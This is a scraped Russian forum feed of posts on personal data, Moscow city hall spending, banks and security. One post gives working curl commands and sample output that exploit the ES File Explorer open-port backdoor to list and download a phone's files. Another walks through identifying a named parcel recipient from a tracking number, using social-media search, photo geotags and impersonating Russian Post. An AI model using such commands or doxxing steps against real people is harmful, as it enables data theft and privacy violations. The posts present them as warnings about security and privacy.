Если, конечно, вы не хотите, чтобы данные вашего паспорта и ваше место работы завтра с вашего же разрешения оказались в распоряжении кредитных отделов пары-тройки банков, которые немедленно начнут звонить вам с выгодными предложениями.


Образец письма: https://docs.google.com/document/d/1iN5fZWRPhUBk1iQPignBwKHr...


Заявление необходимо отправить заказным письмом с уведомлением о вручении по следующим адресам:

Руководителю Департамента предпринимательства и инновационного развития города Москвы Фурсину А.А.

125009, г. Москва, Романов переулок, д.4 стр.2

dpir@mos.ru

Руководителю Департамента информационных технологий города Москвы Лысенко Э.А.

123112, г. Москва, 1-Красногвардейский проезд, д. 21, стр. 1

dit@mos.ru

Генеральному директору ГКУ г. Москвы «Информационный город» Дзенгану А.Н.

123112, г. Москва, 1-Красногвардейский проезд, д. 21, стр. 1

ig@it.mos.ru

ВРИО генерального директора Фонда «Московский инновационный кластер» Валетову А.И.

125009, г. Москва, Вознесенкий пер., д. 22

support@i.moscow

Настоятельно рекомендуем также подписанное бумажное письмо отсканированить либо сфотографировать и отправить по указаным электронным адресам с примечанием, что оригинал выслан заказным письмом почтой (можно приложить номер трека).

Также скан стоит также отправить через приёмную Правительства г. Москвы https://www.mos.ru/feedback/reception/ в адрес Департамента информационных технологий и Департамента предпринимательства и инновационного развития, с тем же примечанием.

После получения вашего письма у соответствующих структур есть 30 дней на удаление ваших персональных данных.


P.S. За бдительность редакция искренне благодарит Alex Petrov.

https://www.facebook.com/photo.php?fbid=10222256610194095&am...


Копипаста: https://m.habr.com/ru/company/analogbytes/blog/503552/

Показать полностью
108

Банки такие банки...

Понадобилось открыть ИП. Как только мои данные попали в налоговую, сразу начались звонки от банков (персональные данные? не, не слышал). Все предлагают открыть счет именно у них. На просьбу отправить условия на почту большинство отвечает "там очень длинно, давайте мы вам голосом расскажем". Ну да, конечно, голосом-то я все цифры отлично запомню. Пара человек посоветовали поискать документацию самому, на сайте банка.

Звонить начинают с девяти утра, ведь информацию о том, что будильник у меня стоит на десять я в налоговую не предоставлял.

Один из банков позвонил трижды с разницей в полчаса. Поругался чуть-чуть, больше не звонят.

Банк, через который я для простоты оформлял всё в налоговой позвонил и тоже не смог прислать тарифы. А потом подключил меня на самый простой тариф автоматически, так как я поставил такую галочку где-то на старте, когда документы передавал. Зачем звонили?..

Начал отвечать, что счет открыт, но если очень хотите - пришлите мне информацию о тарифах, я подумаю. Один банк прислал в телеграмм скриншот кратких условий. Второй - уточнил, в каком я городе, чтобы прислать правильную информацию, после чего скинул смской ссылку на сайт, где нужно выбрать свой город.

Не понимаю, как они вообще так работают...

389

Как одним указом Собянин вывел на улицы тысячи нарушителей карантина

Меня периодически распирает от того, насколько низкой квалификации работают чиновники в России. Она настолько низкая, что порой кажется, что это ты не улавливаешь в их действиях сакрального смысла. На самом деле это не так и большинство чиновников от главы района до президента действуют в основном по понятиям и интуитивно.

Вернусь к теме. Несколько часов назад господин Собянин опубликовал указ, где изменены требования на получение пропусков для автомобиля:

Как одним указом Собянин вывел на улицы тысячи нарушителей карантина Москва, Мэрия, Коронавирус, Карантин, Политика

Основное внимание стоит обратить на «Причем сделать это требуется не менее чем за 5 часов до начала первой поездки.»

Все вроде бы ничего, но у этого пункта нет даты начала действия. Это означает, что все, кто сегодня сел в свои автомобили и оформил разовый пропуск менее, чем за 5 часов, становятся нарушителями. Это вообще как? «Кто так строит?».

Для некоторых других пунктов мозгов хватило указать даты начала действия.

Как одним указом Собянин вывел на улицы тысячи нарушителей карантина Москва, Мэрия, Коронавирус, Карантин, Политика

Уважаемая мэрия! Я периодически отчисляю в бюджет налоги, можете на них нанять на сдельную оплату труда аналитика, который хотя бы пару раз будет вычитывать ваши регулярно публикуемые отрыжки. Благо дефицита кадров сейчас нет, так как с мерами, принимаемыми нашим правительством, уже чуть ли не половина города либо без работы либо на недоплачиваемом отпуске.

Спасибо.

UPD Уточнения к посту #comment_167005348

Показать полностью 1
199

Пилим - будем пилить

Глава фонда «Волонтеры в помощь детям-сиротам»  Альшанская отреагировала на информацию о том, что мэрия Москвы заключила крупнейший контракт на закупку бетонных бордюров. Она написала в фейсбуке, что ждет отмены этого контракта.

О том, что мэрия Москвы заключила контракт на закупку бетонных бордюров, писала «Медуза». По данным издания, договор на 3,2 миллиарда рублей подписали 27 марта — в последний рабочий день перед выходными, которые объявили в связи с коронавирусом.

«Я жду, что контракт отменят. И поддержат людей, чьи бизнесы закрываются. Тех, кому нечем платить сотрудникам. Поддержат семьи, чьи кормильцы потеряли работу и им реально буквально нечего есть. Поддержат многодетные семьи, чей бюджет не справляется с ростом цен (ежедневным, очевидным). Поддержат огромное количество людей из самых уязвимых категорий, которым сейчас очень тяжело, людей, запертых в психоневрологических интернатах и детских домах, бездомных, взрослых и детей с инвалидностью», — написала Альшанская

321

Лучшее в информационной безопасности

Лучшее в информационной безопасности Разработка, Персональные данные, Информационная безопасность, Профессиональный юмор

НЕ ПЕРСОНАЛЬНЫЕ ДАННЫЕ:

1. НЕ ПОЛЬЗОВАТЕЛИ

2. НЕ ПАРОЛИ

3. НЕ ПЛАТЕЖНЫЕ ДАННЫЕ


— О да, улучшение безопасности — следующий шаг в наших планах.


Лучшее в информационной безопасности заключается в том, что чем дольше вы откладываете вопросы, связанные с ней, тем меньше вам вообще нужно ими заниматься.

2732

Дырявый Сапсан

Дырявый Сапсан Сапсан, РЖД, Wi-Fi, Взлом, Информационная безопасность, Персональные данные, Текст, Длиннопост, Негатив

Уже был пересказ новости с хабра, как один пассажир обнаружил дыру в безопасности, подключившись к Wi-Fi в поезде.

Недавно история получила продолжение.


Немного пояснений:

В поезде, для доступа к Wi-Fi, надо указать номер места, вагона и последние 4 цифры паспорта.

Собственно, данные паспорта должны где-то храниться, а если они хранятся в локальной сети, то может быть к ним есть доступ не только у системы авторизации.

Немного покопавшись, пассажир получил полный доступ к важным контейнерам на сервере, в том числе и базе данных.

https://habr.com/ru/post/476034/


Достаточно иметь ноутбук, а при должном умении, хватит и смартфона, установить популярные средства для администрирования сети. И спокойно подключиться к внутренней сети РЖД, скачать данные пассажиров, ставить майнеры, а то и вовсе, стереть содержимое.


Ну вот, дыры есть, пароли простые и одинаковые (это то же самое, что их отсутствие). Казалось бы, очевидно, нормально настроить докер и службы, чтобы каждый школьник не заходил в ssh под рутом.

Но нет, это ведь РДЖ. Тут все не как у людей.

Они взялись "расследовать" это дело.

https://habr.com/ru/news/t/476422/


По итогу расследования выяснили, что Сапсан взломать обычный человек не способен. Следовательно, взломавший - злоумышленник. К тому же, обладающий специальными техническими средствами.

А с системой все в порядке, ибо «Что есть защищенная система? Защищенная система — это та система, взлом которой стоит дороже, чем ценность информации, которая там есть. Вот и все», — подытожил директор по информационным технологиям ОАО «РЖД»».

https://habr.com/ru/news/t/476920/


Из этого можно сделать вывод, что защищать персональные данные пассажиров дороже, чем нормально настроить порты.


Ну и ладно, потереть данные на сервере это не такая уж и трагедия, поезд от этого не остановится. К тому-же персональные данные давно уже все слили, их можно почти легально купить оптом или в розницу.

Главный посыл не в этом, а в том, что многие критически важные детали держатся на каких-нибудь племянниках троюродного брата жены директоров ИТ, с которых нет никакого спроса.


А если какой-нибудь здравомыслящий человек делает комментарии, то его пытаются напугать или говорят, что все и так прекрасно работает. В случае коллапса - наклеивают новые обои с нарисованными окнами и выставляют террористами, попавших под руку.


Технологии развиваются и расширяются, а процент чиновников, которые в них не разбираются, не падает. Скоро дело дойдет до того, что пара человек смогут парализовать всю страну, подключившись к дырявой инфраструктуре.

Показать полностью
116

В интернет - по паспорту... Гладко было на бумаге, да забыли про овраги...

Чем дальше, тем абсурднее. Госдуме и Совете Федерации всерьёз предложили обсудить идею входа в интернет по паспорту

ссылка

Автор идеи - президент Ассоциации предпринимателей по развитию бизнес-патриотизма "Аванти" Рахман Янсуков. Мотивация: "персонификация каждого юзера, с целью предотвращения неправомерных действий, а также ограждение несовершеннолетних от негативного влияния" - по сути размытая, неконкретная, шаблонная аргументация.

Оставим сейчас в стороне главный вопрос: для чего это нужно и кому это выгодно. Вспомним вот о чём...


Инициаторы этого типично вахтёрского безумия думают однобоко. Нужно быть не совсем в здравом уме, чтобы не понимать, что ввод паспортных данных при входе в интернет означает повальный слив персональных данных граждан в сеть. Которым с огромной радостью будут пользоваться в своих целях мошенники разных мастей. Эта инициатива не только не оградит, но наоборот - усилит негативное влияние интернет-криминала на добропорядочных граждан.


Впрочем, инициаторам этой глупой затеи всё это божья роса, на сограждан им наплевать. Про то, что добропорядочный юзер вполне рутинно вычисляется по IP-адресу, они, видимо, забыли. Ну а жулик будет всё это спокойно обходить по VPN, и легко воровать данные паспортов. К своему вящему удовольствию. К какому масштабному обману населения это приведёт, просто неописуемо. Остаётся только молиться, что всё же восторжествует здравый смысл, и  в ГД и СФ отклонят опасную идею.

461

Автомобиль «впечатал» пенсионера в стену на парковке мэрии Москвы

На парковке мэрии Москвы служебный автомобиль Audi сбил пешехода, «впечатав» его в стену.


Видео инцидента опубликовало в субботу, 2 ноября, издание Baza.


Авария случилась утром накануне. Водитель уверяет, что в машине самопроизвольно включился задний ход.


Пострадавший, 61-летний Александр Иванов, был доставлен в НИИ скорой помощи имени Склифосовского. Он находится в реанимации в тяжелом состоянии, передает Telegram-канал «Подъем».


В департаменте региональной безопасности и противодействия коррупции Москвы сообщили агентству «Интерфакс», что пострадавшему оказывается вся необходимая помощь.

«Во взаимодействии с органами ГИБДД проводится разбирательство данного происшествия», — добавили в мэрии.


Источник: https://lenta.ru/news/2019/11/02/dtp/

487

Хакеры «Лурк», подозреваемые в хищении 1,2 млрд рублей у россиян, обвинили во взломе Сбербанка бывшего сотрудника «Лаборатории Касперского».

Хакеры «Лурк», подозреваемые в хищении 1,2 млрд рублей у россиян, обвинили во взломе Сбербанка бывшего сотрудника «Лаборатории Касперского». Россия, Новости, Хакеры, IT, Кибербезопасность, Персональные данные, Взлом, Информационная безопасность

Члены хакерской группировки «Лурк», подозреваемые в хищении 1,2 млрд рублей у россиян, обвинили во взломе Сбербанка бывшего сотрудника «Лаборатории Касперского» Руслана Стоянова, осужденного за госизмену. Об этом говорится в заявлении для СМИ лидера хакеров Константина Козловского. По его словам, недавняя утечка данных клиентов Сбербанка — «мелкое событие» по сравнению с тем, что делали «лурки».


«Стоянов ломанул весь „Сбербанк-лизинг“ — компанию-разработчика Сбербанка для физлиц — и весь Северо-Западный филиал Сбера, — заявил Козловский. — Весь Domain Admin. Представьте, есть огромное здание Сбера, Domain Admin — ключ ко всем дверям в нем».


В подтверждение слов Козловского указывает на листы из уголовного дела хакеров — распечатки их общения в мессенджере Jabber во время взлома (события 2016 года). «Все, я главный домен админ Сбера», — пишет пользователь с ником Meg. «Закрепись, пожалуйста», — просит его Cashout. «Работал бы Ваш файл, закрепился бы, наверное», — отвечает Meg, сообщая позже, что смог отправить СМС-ку от Сбербанка.


«Мне, Козловскому, следствие вменяет использование ника Cashout, — заявил „URA.RU“ лидер хакеров. — Ник Meg же следствием не вменяется никому. По делу видно — он взламывал Сбер и многое другое. <…> Уже четвертый год все мои попытки рассказать, что Meg — это Стоянов Руслан из „Лаборатории Касперского“, разрушаются о нежелание властей слышать правду».


«На одном из ближайших заседаний суда мой подзащитный и его товарищи намерены потребовать установления личности, скрывающейся за ником Meg», — заявила агентству адвокат Козловского Ольга Кезик.


В деле «лурков» есть распечатка журнала операций вируса (см. СКРИН), которые также можно расценить как подтверждение взлома серверов Сбербанка в 2016 году — пояснения этого «URA.RU» представил другой участник группировки Александр Сафонов. «URA.RU» направило запросы — из «Лаборатории Касперского» ответ к моменту публикации не поступил, в Сбербанке заявили, что не комментируют данную тему.


Источник: https://ura.news/news/1052403240

Показать полностью
693

Бордюрная реновация в Москве: столичная мэрия закупилась еще на 3 млрд

Бордюрная реновация в Москве: столичная мэрия закупилась еще на 3 млрд Москва, Бордюр, Мэрия, Здравствуйте, Новости

Мэрия Москвы объявила рекордную закупку гранитных бордюров, которых хватит почти на четверть всех столичных дорог. Заплатить за 941 км таких ограждений мэрия готова почти 3 млрд рублей, а общая сумма трат на эти цели уже превысила 10 млрд рублей.

Как пишет «Коммерсант», 941 км гранитных бордюров планирует приобрести в рамках четырех тендеров ГБУ «Автомобильные дороги», из них 870 км на 2,2 млрд рублей должно быть размером 300х150 мм, 6 км – «экзотического» бордюра размером 300х300 мм с радиусом кривизны 0,5-3,5 м и 3,6-10 м, этот камень стоит 19-20 тысяч за один метр.

При этом в 2019 году структуры мэрии уже закупали каменные бордюры на 2,3 млрд рублей, а за последние пять лет объем закупок составил почти 13 млрд рублей. Издание отмечает, что объем четырех последних тендеров становится понятен, если учесть, что длина МКАД составляет 108 км, а протяженность всех столичных дорог – 3,6 тысячи км. 

Победителями трех конкурсов стали уфимское ООО «Башкирский камень» и московское ООО «ТД Спецпласт», до этого уже выигрывавшие столичные тендеры.
Одним из самых дорогих в закупках этого года стал гранитный бордюр размером 300х600 мм с радиусом кривизны 3,6-10,5 м за 43,7 тысячи рублей за погонный метр. 

При этом городские власти не горят желанием обосновать драгоценные закупки, которые обходятся бюджету в круглую сумму. В комплексе городского хозяйства Москвы «Коммерсанту» не ответили на вопрос зачем городу понадобилось столько бордюров. 

Однако участникам рынка очень нравится цена, которую мэрия готова платить за гранитные бордюры. Например, директор челябинского ООО «ТК Офис Сити», которое занимается поставками гранита, Андрей Лукьянчиков заявил изданию, что был бы счастлив, если бы у него покупали гранитное ограждение по такой цене – речь шла о бордюре ГП-1размером 300х150 мм с начальной ценой 2,5 тысячи рублей за погонный метр.
Отметим, что москвичи регулярно возмущаются в соцсетях дорогостоящими процедурами по «смене зимнего бордюра на летний», и публикуют фотографии развороченных тротуаров и перекрытых дорог. 
Горожане заявляют, что бордюры в некоторых местах меняют по 2-3 раза в год, при этом они находятся в нормальном состоянии и замены не требуют. Фактически часто дорожные усилия мэрии приводят только к автомобильным «пробкам» и дискомфорту пешеходов, отмечают жители российской столицы.
Ссылка: https://newdaynews.ru/moskow/667653.html?utm_referrer=https%...


https://www.kommersant.ru/doc/4039627?from=main_5

Показать полностью
125

Курочка по зернышку, или кому интересно досье на Васю Пупкина?


В обсуждении прошлого поста про Большого Брата и его длинный нос некоторые комментаторы завели предсказуемую волынку: кому интересен скромный обыватель со своими секретами? Рассатие в общественном месте, неоплаченный штраф за парковку самоката и шашни с замужней соседкой – все это не интересует корпорации. Это интересует совершенно другую категорию дельцов, но для них «ковровый» шпионаж пока слишком дорогое удовольствие.


А корпорации, повторюсь, интересуют всего 2 обстоятельства из жизни простых смертных: сфера интересов и благосостояние. От этого зависит, что именно корпорации будут пытаться впарить смертным. Условно говоря, разнорабочему со случайными заработками будут рекламировать новый сорт пастеризованного пива, а офисному планктону с доходом выше среднего – кредитомобиль.


Теперь в общих чертах о том, как происходит сбор данных об интернет-пользователях и их маркетинговое профилирование, т.е. составление демографического, социального, психологического, финансового и прочих профилей.


Допустим, в Интернете появляется новый пользователь: Лунтик приземлился и понесся по бескрайним просторам прона, котяток и прона с котятками, для чего воспользовался поисковиком Гугла. Тут-то Лунтик и получил персональный идентификатор, с которым начало составляться его досье: по каким ключевым словам он ищет порнуху, какие из ссылок в поисковой выдаче его заинтересовали до степени перехода, какие паузы были между переходом по разным ссылкам, какие уточняющие запросы и т.д.


На некоторых из сайтов, которые посетил наш Лунтик, были установлены разные полезные скрипты, любезно предоставленные тем же Гуглом (баннерная реклама, аналитика, загружаемые шрифты и т.д.), поэтому корпорации удалось снять более подробную информацию об эротических предпочтениях нашего героя.


Первая часть профиля сложилась, например: белый гетеросексуальный мужчина 30-35 лет, интересующийся котятками лолями и тентаклями. С вероятностью 84% испытывает проблемы с эрекцией. Находится в Волгоградской области, Россия, но пытается притвориться, что в Белизе (использует кривую прокси). Родной язык – русский, знает английский на базовом уровне. Навыки компьютерной грамотности – выше базового, переоценивает свои способности.


Это я придумал процентов десять той информации, которую собрал Гугл после одного лишь трипа Лунтика по порносайтам, на самом деле там уже было бы досье на 10 страницах с различными утверждениями и предположениями относительно нашего героя. И с тем же успехом Лунтик мог бы искать не прон, а запчасти на Camry или способ борьбы с колорадами (никакой политики, я про жуков!) – Гугл точно так же составил бы профиль, просто другую его часть.


Проблема в том, что любителей лолей, авто и огородничества в картотеке Большого Брата – не сотни и даже не тысячи, поэтому корпорация будет терпеливо ждать, пока Лунтик проявит другие свои интересы и их можно будет наконец сложить в уникальную мозаику.


Гугл терпеливо дождется следующего поискового запроса, охотно пошпионит за перемещениями Лунтика на сайтах, где стоят его скрипты (а это миллионы сайтов), с интересом почитает его переписку в Гуглопочте (о, тут интересно и содержание переписки, и корреспонденты Лунтика – ведь на них тоже составлено досье). С собственной соцсетью не задалось, а то бы еще виджеты «Полайкать в Гуглоплюсе» помогали...


Гуглу интересно все, куда только дотянется его длинный нос. Связать заходы Лунтика с домашнего и рабочего компов, со смартфона и планшета – не проблема. Привязать данные геолокации к лунтиковскому профилю – как два пальца (он же сам их по дурости передаст).


Изучить платежи Лунтика – уже посложнее, приходится копаться в лунтиковской почте и пытаться понять, что из входящих писем является инвойсом (результаты изысканий можно посмотреть здесь). А еще всегда можно положиться на кретина, включившего в код банковского сайта такие полезные и главное – совершенно бесплатные – скрипты от доброго Гугла. Кто сказал, что такого не может быть? Изучите код сайта своего банка, потом спорьте.


Впрочем, что там банки – большинство госсайтов сливает данные о своих посетителям добрым корпорациям. Другой прекрасный пример из жизни Больших Братьев добрых корпораций: код рекламной сети Яндекса на сайте «Московские госуслуги». Код частной рекламной сети на государственном сайте с персональными данными и прочими вкусняшками для любого маркетолога, Карл! Не переживайте, код от доброго Гугла там тоже есть.


В результате курочка по зернышку, по зернышку... Любителей лоли – миллиарды, русскоязычных – миллионы, считающих себя кулхакерами – сотни тысяч, в возрасте 30-35 – десятки тысяч, интересующихся при этом металлопрокатом и бегом трусцой, живущих в Волгоградской области, выходящих в Интернет как правило с 14:00 до 20:00 через браузер Edge и регулярно делающих ошибку в слове «менет» – всего один. Добро пожаловать в дивный новый мир киберпанка картотеку, Лунтик-4981620017!


Да-да, хотя Лунтика на самом деле зовут Василий Иванович Пупкин, корпорации глубоко наплевать; это знание не будет лишним, но оно не требуется. Корпорации важно, что Лунтик-4981620017 интересуется проном, закупает металлопрокат средним оптом, мнит себя спортсменом и хакером, имеет располагаемый доход около 20 килорублей в месяц чистыми.


Ну, даже не будучи гением маркетинга, что бы ты, анон, скорее попробовал впарить Василию Ивановичу Лунтику-4981620017? Подписку на новый сайт с эксклюзивным проном или снаряжение для альпинизма? Метизы с откатом закупу или новую модель «ламборгини»?


Вот примерно так же и Гугл рассуждает, только действует тоньше. Реклама – это же не обязательно мигающий баннер «Купи меня!!!» Это и «случайно» выскочившие в результатах поиска «независимые» обзоры и сравнения, где рекламируемый товар совершенно «объективно» выигрывает у случайно специально подобранных для сравнения. И посты от «реальных людей», делящихся «своим» опытом использования рекламируемого товара. Если долго и аккуратно ездить по ушам, идея приобрести товар Х покажется вам собственной, а вовсе не следствием массированной рекламы.


Впрочем, почему мы говорим о товарах да услугах, у Большого Брата инструмент для манипуляции сознанием, а использовать его можно в разных целях. Для той же политической рекламы – пожалуйста. Вместо баннеров с сиськами безымянных лярв – баннеры с сиськами тех же лярв, заснятых в компании с неугодным кандидатом... в мэры Чудищенска. Конечно, все это делается тоньше, но суть такая: все равно, что продавать – товар, услугу или идею, технология одна и та же, лишь бы за это платили, а кому и как продавать – это корпорации знают (вы же сами им все о себе рассказали). Добро пожаловать в дивный новый мир киберпанка, мы уже в нем, только не все это поняли!

Показать полностью
1354

Бэкдор в ES File Explorer File Manager, позволяющий скачать любой файл из твоего телефона

Цель данного поста - предупредить пользователей и предостеречь от использования дырявого говнопродукта, автор не призывает использовать приведённую ниже информацию для получения доступа к чужим данным, т.к. можно получить путёвку на 2 года с бесплатным шампанским.


Недавно нашли бэкдор в ES File Manager, приложение просто создало http сервер не защищённый паролем на порту 59777, который позволяет получить список всех файлов, приложений, скачать файлы, запустить любое из установленных приложений и многое другое, ES File Manager об этом, естественно, никак не предупреждает пользователя. Таким образом, чувак из той же сети(например в маке) может получить доступ ко всем вашим файлам.


Вроде первый написал этот чувак https://twitter.com/fs0c131y/status/1085460755313508352

Вот тут сделали скрипт для работы с сервером https://github.com/fs0c131y/ESFileExplorerOpenPortVuln


Я скрипт не запускал, а воспользовался curl'ом


Пишем:

> curl --header "Content-Type: application/json" -X POST http://192.168.1.3:59777/ --data '{"command":"listPics"}'

Где 192.168.1.3 - IP моего телефона в сети. Получаем список всех фоток на телефоне:

[

{"name":"IMG_20180802_192056_HHT.jpg", "time":"8/2/18 08:20:56 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180802_192056_HHT.jpg", "size":"1.64 MB (1,720,783 Bytes)", },

{"name":"IMG_20180728_160906.jpg", "time":"8/2/18 08:22:02 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_160906.jpg", "size":"4.69 MB (4,914,234 Bytes)", },

{"name":"IMG_20180801_120928.jpg", "time":"8/2/18 08:22:02 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180801_120928.jpg", "size":"5.68 MB (5,951,479 Bytes)", },

{"name":"IMG_20180728_132235.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_132235.jpg", "size":"4.94 MB (5,176,983 Bytes)", },

{"name":"IMG_20180728_155557.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_155557.jpg", "size":"4.08 MB (4,275,890 Bytes)", },

{"name":"IMG_20180730_103456.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180730_103456.jpg", "size":"3.60 MB (3,776,144 Bytes)", },

Скачивать вот так:

> curl --header "Content-Type: application/json" http://192.168.1.3:59777/storage/2C7B-180C/DCIM/Camera/IMG_2... > /tmp/pic.jpg

Только что поставил последнюю версию с play маркета, запустил - бекдор есть.

4134

Персональные данные

Была вчера в МФЦ, заказывала "справку о наличии/отсутствии судимостей" и дали мне бланк-согласие на хранение, обработку и передачу третьим лицам персональных данных. Последний "запрос" мне в этом "согласии" ну очень не понравился.

Подхожу на приём, отдаю заявление для получения справки и спрашиваю про согласие на предоставление персональных данных третьим лицам.

Говорю: я не согласна.

Сотрудник говорит: тогда не сдавайте эту бумагу, она ни на что не влияет.

Занавес.

110

Очистка сквера в Москве

Месяца два назад я писал об отвратительном состоянии здания Винзавода в Москве, а также сквера возле него. Сейчас про здание забудем, ибо речь пойдёт про сквер. Было раньше:

Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост

Соответственно было написано обращение в мэрию. Не так давно пришёл ответ:

Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост

Что ж, решил проверить. И... всё действительно почистили, объявления сорвали, граффити подтёрли. Но... люди снова всё начали засирать. Сейчас там примерно так:

Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост
Очистка сквера в Москве Москва, Чистота, Мэрия, Чистка, Город, Городское пространство, Гражданская позиция, Длиннопост

Отдельно хочется выделить долбоящеров, которые расклеивали объявления про социальную помощь и агитки.


Будем честными, с рекламой кредитов всё понятно - людям нужны клиенты и они таким скотским способом их привлекают, здесь это хотя бы понятно, но наклеенных объявлений о социальной помощи так много, словно человек, испоганивший этот сквер, сам призывал помочь ему. При этом объявления от какой-то православной организации, ну что ж, может они себе на храмы это налепят? И да, я понимаю, что может это и вовсе какая-нить контора, которая ищет рабов, которых искать не будут, но удивительно, что на это никто не реагирует.

Агитка кандидата в мэры Михаила Балакина тоже убивает. Я допускаю, что может это конкуренты таким странным образом пытаются его очернить, мол, смотрите, как всё поганит, но если же это его сторонники так лепят объявления, то легко представить, каким мэром он может стать. При этом агитка приклеена на скульптуру (хз как ещё назвать) сзади, то есть её даже не увидеть, если специально не лезть в эту жопень.

Если подводить итоги, то приятно, что на призывы реагируют и чистят и обидно, что не следят за дальнейшей чистотой. Насколько я понимаю, то и наказания за такую расклейку особо нет, да и сложно доказать, что это расклеили по заказу рекламируемого, а не, например, конкурента.

В общем, видите срач - не стесняйтесь писать. Это касается жителей всех городов России. Для Москвы же, кто не знает (а думают таких осталось много) - пишите на портал Наш город или же напрямую в мэрию (из личных данных там только имя/фамилия/почта обязательны). Чистота и опрятность нашего жилого пространства зависит от нашей активности, ибо сами городские власти те ещё ленивые жопы.

Показать полностью 15
1980

О важности цифровой анонимности или как идентифицировать человека за 5 минут

Увидел пост https://pikabu.ru/story/sila_pikabu_v_deystvii_uzhe_v_smi_k_postu_o_vorovstve_posyilok_5773530, посмотрел видео.

На 1:55 звучит "... один из получателей, который захотел остаться неизвестным, выложил в сеть маршрут передвижения своего заказа...".

Делаем стоп кадр.

О важности цифровой анонимности или как идентифицировать человека за 5 минут Москва, Кража посылок, Рен ТВ, Сила Пикабу, Пикабу, Почта России, Персональные данные

Четкость конечно не ахти, но ее вполне хватает, что бы разглядеть трек - RB473722521SG.
Окай, пробиваем, получаем инфу.

Мелкий пакет: 378 г.
От кого: WongNga Pan
Кому: Hrenova Irina Aleksandrovna
Адресовано: 105215, Russian Federation

Гуд. Пробиваем индекс - Москва, Гольяновский район.
Далее в дело вступает поиск людей по соцсетям через яндекс. Настроим фильтр на возраст 14-80 лет, город на Москву.

https://yandex.ru/people?text=%D1%85%D1%80%D0%B5%D0%BD%D0%BE%D0%B2%D0%B0%20%D0%B8%D1%80%D0%B8%D0%BD%D0%B0%20%D0%B0%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80%D0%BE%D0%B2%D0%BD%D0%B0&lr=213&ps_age=14-80&ps_geo=%D0%BC%D0%BE%D1%81%D0%BA%D0%B2%D0%B0

Найдено всего 9 человек.
Фотки есть. А значит что есть вероятность, что на фотках остались геотеги. Для тех кто не в курсе что это читать здесь.
По хорошему если пробить фотки, сделанные дома или что то похожее - можно идентифицировать человека. Ну или можно просто писать всем, представляясь представителем почты России, сказать, что нашли Вашу посылку, и если человек откликнется - мы его идентифицировали.

Ввиду всего этого фраза "один из получателей, который захотел остаться неизвестным" меня достаточно сильно смущает. Да и появляется вопрос - как телеканал позволяет себе разбрасываться данными, которые позволяют так или иначе идентифицировать людей. Ну и отдельно забавляют люди, которые не заботятся о своей цифровой анонимности.

Друзья, будьте аккуратнее.

Показать полностью
94

Стриптизерский шест (дом)

По мотивам https://pikabu.ru/story/kolonnyiy_zal_dom_5343517#comments


Входные данные. Супер Лухари Вип общага (по выражению охранника с ресепшена) Савеловский Сити. 6 корпусов: две маленькие башни (синяя и желтая) офисы, четыре башни (красная и три высотки) - жилые дома. На сегодняшний день - 16 сентября 2017 - введены в эксплуатацию офисы и красная башня, про которую и речь в посте.

Стриптизерский шест (дом) Москва, Строительство, Мэрия, Савеловский, Савеловский сити, Новостройка, Длиннопост

Центр Москвы, пешая доступность до Кремля. Но строят как везде. В маленьких студиях застройщик решил несколько отойти от плана и облагодетельствовать жильцов стриптизерскими шестами.


Вот так продают эти студии (на плане в правом нижнем углу маленькая студия). План из договора долевого участия, чтоб не было вопросов.

Стриптизерский шест (дом) Москва, Строительство, Мэрия, Савеловский, Савеловский сити, Новостройка, Длиннопост

Так коммуникации ДОЛЖНЫ выглядеть. Фото из соседней квартиры.

Стриптизерский шест (дом) Москва, Строительство, Мэрия, Савеловский, Савеловский сити, Новостройка, Длиннопост

А вот это получилось по факту. Экспликация и фото самих студий.

Стриптизерский шест (дом) Москва, Строительство, Мэрия, Савеловский, Савеловский сити, Новостройка, Длиннопост
Стриптизерский шест (дом) Москва, Строительство, Мэрия, Савеловский, Савеловский сити, Новостройка, Длиннопост

А теперь самое интересное - застройщик обязует оплатить площадь между этим шестом и стеной как полезную. В переводе на финансовый эквивалент - 100-120к руб.


Почему люди такое купили? Никто не показал студии вживую. Заверили, что будет как на плане.


Вот такие пироги.


Бонусом пару фоток оригинальных конструктивных решений кладовок.

Стриптизерский шест (дом) Москва, Строительство, Мэрия, Савеловский, Савеловский сити, Новостройка, Длиннопост
Стриптизерский шест (дом) Москва, Строительство, Мэрия, Савеловский, Савеловский сити, Новостройка, Длиннопост
